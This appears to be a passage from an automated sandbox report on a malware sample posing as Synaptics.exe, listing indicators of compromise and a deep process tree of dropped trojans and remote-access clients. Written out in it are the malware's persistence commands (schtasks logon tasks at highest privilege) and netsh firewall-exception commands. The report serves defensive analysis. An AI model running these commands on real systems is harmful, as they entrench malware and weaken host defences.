813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a $77svchost.exe -
Runs ping.exe 1 TTPs 22 IoCs
pid Process 328 PING.EXE 2804 PING.EXE 2900 PING.EXE 1628 PING.EXE 2472 PING.EXE 1652 PING.EXE 2980 PING.EXE 632 PING.EXE 1652 PING.EXE 2072 PING.EXE 2208 PING.EXE 2544 PING.EXE 1112 PING.EXE 1216 PING.EXE 2772 PING.EXE 2688 PING.EXE 2512 PING.EXE 1216 PING.EXE 2948 PING.EXE 1000 PING.EXE 2032 PING.EXE 768 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 28 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1416 schtasks.exe 2884 schtasks.exe 2844 schtasks.exe 2144 schtasks.exe 968 schtasks.exe 988 schtasks.exe 1540 schtasks.exe 2944 schtasks.exe 1560 schtasks.exe 1680 schtasks.exe 808 schtasks.exe 2716 schtasks.exe 2552 schtasks.exe 2752 schtasks.exe 844 schtasks.exe 672 schtasks.exe 2216 schtasks.exe 2976 schtasks.exe 1600 schtasks.exe 2656 schtasks.exe 836 schtasks.exe 2160 schtasks.exe 2236 schtasks.exe 2880 schtasks.exe 2384 schtasks.exe 584 schtasks.exe 1508 schtasks.exe 828 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2084 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2844 srtware.exe 2380 server.exe 2380 server.exe 2380 server.exe 2380 server.exe 2380 server.exe 2380 server.exe 2380 server.exe 2380 server.exe 2380 server.exe 2380 server.exe 2380 server.exe 2380 server.exe 2380 server.exe 2380 server.exe 2380 server.exe 2380 server.exe 2380 server.exe 2380 server.exe 2380 server.exe 2380 server.exe 2380 server.exe 2380 server.exe 2380 server.exe 2380 server.exe 2380 server.exe 2380 server.exe 2380 server.exe 2380 server.exe 2380 server.exe 2380 server.exe 2380 server.exe 2380 server.exe 2380 server.exe 2380 server.exe 2380 server.exe 2380 server.exe 2380 server.exe 2380 server.exe 2380 server.exe 2380 server.exe 2380 server.exe 2380 server.exe 2380 server.exe 2380 server.exe 2380 server.exe 2380 server.exe 2380 server.exe 2380 server.exe 2380 server.exe 2380 server.exe 2380 server.exe 2380 server.exe 2380 server.exe 2380 server.exe 2380 server.exe 2380 server.exe 2380 server.exe 2380 server.exe 2380 server.exe 2380 server.exe 2380 server.exe 2380 server.exe 2380 server.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2380 server.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2272 ._cache_Synaptics.exe Token: SeDebugPrivilege 3028 ._cache_Synaptics.exe Token: SeDebugPrivilege 2748 Client-built.exe Token: SeDebugPrivilege 884 Svchost.exe Token: SeDebugPrivilege 996 XClient.exe Token: SeDebugPrivilege 2380 server.exe Token: 33 2380 server.exe Token: SeIncBasePriorityPrivilege 2380 server.exe Token: SeDebugPrivilege 2632 Svchost.exe Token: SeDebugPrivilege 2540 heo.exe Token: 33 2540 heo.exe Token: SeIncBasePriorityPrivilege 2540 heo.exe Token: 33 2380 server.exe Token: SeIncBasePriorityPrivilege 2380 server.exe Token: 33 2540 heo.exe Token: SeIncBasePriorityPrivilege 2540 heo.exe Token: SeDebugPrivilege 308 Svchost.exe Token: SeDebugPrivilege 2392 Terminal_9235.exe Token: 33 2380 server.exe Token: SeIncBasePriorityPrivilege 2380 server.exe Token: 33 2540 heo.exe Token: SeIncBasePriorityPrivilege 2540 heo.exe Token: SeDebugPrivilege 2280 Svchost.exe Token: SeDebugPrivilege 2184 client.exe Token: 33 2380 server.exe Token: SeIncBasePriorityPrivilege 2380 server.exe Token: 33 2540 heo.exe Token: SeIncBasePriorityPrivilege 2540 heo.exe Token: SeDebugPrivilege 2032 Svchost.exe Token: 33 2380 server.exe Token: SeIncBasePriorityPrivilege 2380 server.exe Token: 33 2540 heo.exe Token: SeIncBasePriorityPrivilege 2540 heo.exe Token: 33 2380 server.exe Token: SeIncBasePriorityPrivilege 2380 server.exe Token: SeDebugPrivilege 2912 Svchost.exe Token: 33 2540 heo.exe Token: SeIncBasePriorityPrivilege 2540 heo.exe Token: 33 2380 server.exe Token: SeIncBasePriorityPrivilege 2380 server.exe Token: 33 2540 heo.exe Token: SeIncBasePriorityPrivilege 2540 heo.exe Token: SeDebugPrivilege 2756 Svchost.exe Token: SeDebugPrivilege 688 svchost.exe Token: SeDebugPrivilege 1452 RuntimeBroker.exe Token: SeDebugPrivilege 292 RuntimeBroker.exe Token: 33 2380 server.exe Token: SeIncBasePriorityPrivilege 2380 server.exe Token: SeDebugPrivilege 2224 $77svchost.exe Token: 33 2540 heo.exe Token: SeIncBasePriorityPrivilege 2540 heo.exe Token: SeDebugPrivilege 2784 Svchost.exe Token: 33 2380 server.exe Token: SeIncBasePriorityPrivilege 2380 server.exe Token: SeDebugPrivilege 2976 RuntimeBroker.exe Token: 33 2540 heo.exe Token: SeIncBasePriorityPrivilege 2540 heo.exe Token: SeDebugPrivilege 932 Discord.exe Token: SeDebugPrivilege 2848 Svchost.exe Token: 33 2380 server.exe Token: SeIncBasePriorityPrivilege 2380 server.exe Token: SeDebugPrivilege 2684 powerstealer.exe Token: 33 2540 heo.exe Token: SeIncBasePriorityPrivilege 2540 heo.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 2084 EXCEL.EXE 884 Svchost.exe 2632 Svchost.exe 2280 Svchost.exe 292 RuntimeBroker.exe 2684 powerstealer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2744 wrote to memory of 3028 2744 Synaptics.exe 31 PID 2744 wrote to memory of 3028 2744 Synaptics.exe 31 PID 2744 wrote to memory of 3028 2744 Synaptics.exe 31 PID 2744 wrote to memory of 3028 2744 Synaptics.exe 31 PID 2744 wrote to memory of 1632 2744 Synaptics.exe 33 PID 2744 wrote to memory of 1632 2744 Synaptics.exe 33 PID 2744 wrote to memory of 1632 2744 Synaptics.exe 33 PID 2744 wrote to memory of 1632 2744 Synaptics.exe 33 PID 1632 wrote to memory of 2272 1632 Synaptics.exe 34 PID 1632 wrote to memory of 2272 1632 Synaptics.exe 34 PID 1632 wrote to memory of 2272 1632 Synaptics.exe 34 PID 1632 wrote to memory of 2272 1632 Synaptics.exe 34 PID 3028 wrote to memory of 2540 3028 ._cache_Synaptics.exe 37 PID 3028 wrote to memory of 2540 3028 ._cache_Synaptics.exe 37 PID 3028 wrote to memory of 2540 3028 ._cache_Synaptics.exe 37 PID 3028 wrote to memory of 2540 3028 ._cache_Synaptics.exe 37 PID 3028 wrote to memory of 2748 3028 ._cache_Synaptics.exe 39 PID 3028 wrote to memory of 2748 3028 ._cache_Synaptics.exe 39 PID 3028 wrote to memory of 2748 3028 ._cache_Synaptics.exe 39 PID 3028 wrote to memory of 2748 3028 ._cache_Synaptics.exe 39 PID 3028 wrote to memory of 2844 3028 ._cache_Synaptics.exe 40 PID 3028 wrote to memory of 2844 3028 ._cache_Synaptics.exe 40 PID 3028 wrote to memory of 2844 3028 ._cache_Synaptics.exe 40 PID 3028 wrote to memory of 2844 3028 ._cache_Synaptics.exe 40 PID 2844 wrote to memory of 2316 2844 srtware.exe 42 PID 2844 wrote to memory of 2316 2844 srtware.exe 42 PID 2844 wrote to memory of 2316 2844 srtware.exe 42 PID 3028 wrote to memory of 996 3028 ._cache_Synaptics.exe 43 PID 3028 wrote to memory of 996 3028 ._cache_Synaptics.exe 43 PID 3028 wrote to memory of 996 3028 ._cache_Synaptics.exe 43 PID 3028 wrote to memory of 996 3028 ._cache_Synaptics.exe 43 PID 2748 wrote to memory of 2160 2748 Client-built.exe 44 PID 2748 wrote to memory of 2160 2748 Client-built.exe 44 PID 2748 wrote to memory of 2160 2748 Client-built.exe 44 PID 3028 wrote to memory of 2112 3028 ._cache_Synaptics.exe 46 PID 3028 wrote to memory of 2112 3028 ._cache_Synaptics.exe 46 PID 3028 wrote to memory of 2112 3028 ._cache_Synaptics.exe 46 PID 3028 wrote to memory of 2112 3028 ._cache_Synaptics.exe 46 PID 2748 wrote to memory of 884 2748 Client-built.exe 47 PID 2748 wrote to memory of 884 2748 Client-built.exe 47 PID 2748 wrote to memory of 884 2748 Client-built.exe 47 PID 884 wrote to memory of 968 884 Svchost.exe 48 PID 884 wrote to memory of 968 884 Svchost.exe 48 PID 884 wrote to memory of 968 884 Svchost.exe 48 PID 2112 wrote to memory of 2380 2112 trojan.exe 50 PID 2112 wrote to memory of 2380 2112 trojan.exe 50 PID 2112 wrote to memory of 2380 2112 trojan.exe 50 PID 2112 wrote to memory of 2380 2112 trojan.exe 50 PID 884 wrote to memory of 1464 884 Svchost.exe 51 PID 884 wrote to memory of 1464 884 Svchost.exe 51 PID 884 wrote to memory of 1464 884 Svchost.exe 51 PID 1464 wrote to memory of 2184 1464 cmd.exe 53 PID 1464 wrote to memory of 2184 1464 cmd.exe 53 PID 1464 wrote to memory of 2184 1464 cmd.exe 53 PID 1464 wrote to memory of 2472 1464 cmd.exe 54 PID 1464 wrote to memory of 2472 1464 cmd.exe 54 PID 1464 wrote to memory of 2472 1464 cmd.exe 54 PID 2380 wrote to memory of 1052 2380 server.exe 55 PID 2380 wrote to memory of 1052 2380 server.exe 55 PID 2380 wrote to memory of 1052 2380 server.exe 55 PID 2380 wrote to memory of 1052 2380 server.exe 55 PID 2380 wrote to memory of 1436 2380 server.exe 57 PID 2380 wrote to memory of 1436 2380 server.exe 57 PID 2380 wrote to memory of 1436 2380 server.exe 57 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 3024 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Synaptics.exe"C:\Users\Admin\AppData\Local\Temp\Synaptics.exe"1⤵
- Loads dropped DLL
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2744 -
C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe"C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe"2⤵
- Downloads MZ/PE file
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3028 -
C:\Users\Admin\AppData\Local\Temp\Files\heo.exe"C:\Users\Admin\AppData\Local\Temp\Files\heo.exe"3⤵
- Drops startup file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2540
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Client-built.exe"C:\Users\Admin\AppData\Local\Temp\Files\Client-built.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2748 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:2160
-
-
C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:884 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:968
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\ykNhAdv8d4Im.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:1464 -
C:\Windows\system32\chcp.comchcp 650016⤵PID:2184
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2472
-
-
C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2632 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe" /rl HIGHEST /f7⤵
- Scheduled Task/Job: Scheduled Task
PID:2976
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\T7YTma6d44VC.bat" "7⤵PID:2156
-
C:\Windows\system32\chcp.comchcp 650018⤵PID:604
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost8⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:768
-
-
C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:308 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe" /rl HIGHEST /f9⤵
- Scheduled Task/Job: Scheduled Task
PID:2236
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\Xy59htiiklFl.bat" "9⤵PID:2328
-
C:\Windows\system32\chcp.comchcp 6500110⤵PID:2336
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost10⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:328
-
-
C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"10⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2280 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe" /rl HIGHEST /f11⤵
- Scheduled Task/Job: Scheduled Task
PID:1416
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\wjrShHeoIMEI.bat" "11⤵PID:2076
-
C:\Windows\system32\chcp.comchcp 6500112⤵PID:2040
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2804
-
-
C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"12⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2032 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe" /rl HIGHEST /f13⤵
- Scheduled Task/Job: Scheduled Task
PID:1600
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dP5b7a5SAhul.bat" "13⤵PID:2744
-
C:\Windows\system32\chcp.comchcp 6500114⤵PID:2812
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost14⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2688
-
-
C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"14⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2912 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe" /rl HIGHEST /f15⤵
- Scheduled Task/Job: Scheduled Task
PID:2880
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\7asy2cNpSiWz.bat" "15⤵PID:2160
-
C:\Windows\system32\chcp.comchcp 6500116⤵PID:1628
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost16⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2208
-
-
C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"16⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2756 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe" /rl HIGHEST /f17⤵
- Scheduled Task/Job: Scheduled Task
PID:2884
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\W7mps1gJ7Xcf.bat" "17⤵PID:2660
-
C:\Windows\system32\chcp.comchcp 6500118⤵PID:528
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost18⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2512
-
-
C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"18⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2784 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe" /rl HIGHEST /f19⤵
- Scheduled Task/Job: Scheduled Task
PID:584
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\kO8PrGFHyYxU.bat" "19⤵PID:2856
-
C:\Windows\system32\chcp.comchcp 6500120⤵PID:2896
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost20⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2544
-
-
C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"20⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2848 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe" /rl HIGHEST /f21⤵
- Scheduled Task/Job: Scheduled Task
PID:2752
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\9ZS3VC5rIpg0.bat" "21⤵PID:328
-
C:\Windows\system32\chcp.comchcp 6500122⤵PID:2144
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost22⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2948
-
-
C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"22⤵
- Executes dropped EXE
PID:1500 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe" /rl HIGHEST /f23⤵
- Scheduled Task/Job: Scheduled Task
PID:808
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\Hajd3Dc9REl8.bat" "23⤵PID:2944
-
C:\Windows\system32\chcp.comchcp 6500124⤵PID:1680
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost24⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1000
-
-
C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"24⤵
- Executes dropped EXE
PID:1884 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe" /rl HIGHEST /f25⤵
- Scheduled Task/Job: Scheduled Task
PID:828
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\GNQOOACVrt1S.bat" "25⤵PID:1188
-
C:\Windows\system32\chcp.comchcp 6500126⤵PID:1300
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost26⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1112
-
-
C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"26⤵
- Executes dropped EXE
PID:1536 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe" /rl HIGHEST /f27⤵
- Scheduled Task/Job: Scheduled Task
PID:2656
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YAQ4c7KiKrIt.bat" "27⤵PID:1608
-
C:\Windows\system32\chcp.comchcp 6500128⤵PID:2592
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost28⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2980
-
-
C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"28⤵
- Executes dropped EXE
PID:544 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe" /rl HIGHEST /f29⤵
- Scheduled Task/Job: Scheduled Task
PID:836
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\ZMAYpey9xIKQ.bat" "29⤵PID:1700
-
C:\Windows\system32\chcp.comchcp 6500130⤵PID:2392
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost30⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1216
-
-
C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe"30⤵
- Executes dropped EXE
PID:2432 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe" /rl HIGHEST /f31⤵
- Scheduled Task/Job: Scheduled Task
PID:2552
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\556GADH5ij7L.bat" "31⤵PID:1232
-
C:\Windows\system32\chcp.comchcp 6500132⤵PID:2800
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost32⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1652
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\srtware.exe"C:\Users\Admin\AppData\Local\Temp\Files\srtware.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2844 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2844 -s 1964⤵
- Loads dropped DLL
PID:2316
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:996
-
-
C:\Users\Admin\AppData\Local\Temp\Files\trojan.exe"C:\Users\Admin\AppData\Local\Temp\Files\trojan.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2112 -
C:\Users\Admin\AppData\Roaming\server.exe"C:\Users\Admin\AppData\Roaming\server.exe"4⤵
- Drops startup file
- Executes dropped EXE
- Drops autorun.inf file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2380 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe" "server.exe" ENABLE5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1052
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall delete allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe"5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1436
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe" "server.exe" ENABLE5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2356
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Terminal_9235.exe"C:\Users\Admin\AppData\Local\Temp\Files\Terminal_9235.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2392 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "client" /tr '"C:\Users\Admin\AppData\Roaming\client.exe"' & exit4⤵
- System Location Discovery: System Language Discovery
PID:756 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "client" /tr '"C:\Users\Admin\AppData\Roaming\client.exe"'5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:988
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp6EE9.tmp.bat""4⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2748 -
C:\Windows\SysWOW64\timeout.exetimeout 35⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:1560
-
-
C:\Users\Admin\AppData\Roaming\client.exe"C:\Users\Admin\AppData\Roaming\client.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2184
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\Files\RuntimeBroker.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1452 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\am1\RuntimeBroker.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:1560
-
-
C:\Users\Admin\AppData\Roaming\am1\RuntimeBroker.exe"C:\Users\Admin\AppData\Roaming\am1\RuntimeBroker.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:292 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\am1\RuntimeBroker.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:2384
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hKXtIWzqifh9.bat" "5⤵PID:2836
-
C:\Windows\system32\chcp.comchcp 650016⤵PID:1540
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2072
-
-
C:\Users\Admin\AppData\Roaming\am1\RuntimeBroker.exe"C:\Users\Admin\AppData\Roaming\am1\RuntimeBroker.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2976 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\am1\RuntimeBroker.exe" /rl HIGHEST /f7⤵
- Scheduled Task/Job: Scheduled Task
PID:1680
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\zl1ZyuSVRGK1.bat" "7⤵PID:2872
-
C:\Windows\system32\chcp.comchcp 650018⤵PID:2404
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost8⤵
- System Network Configuration Discovery: Internet Connection Discovery
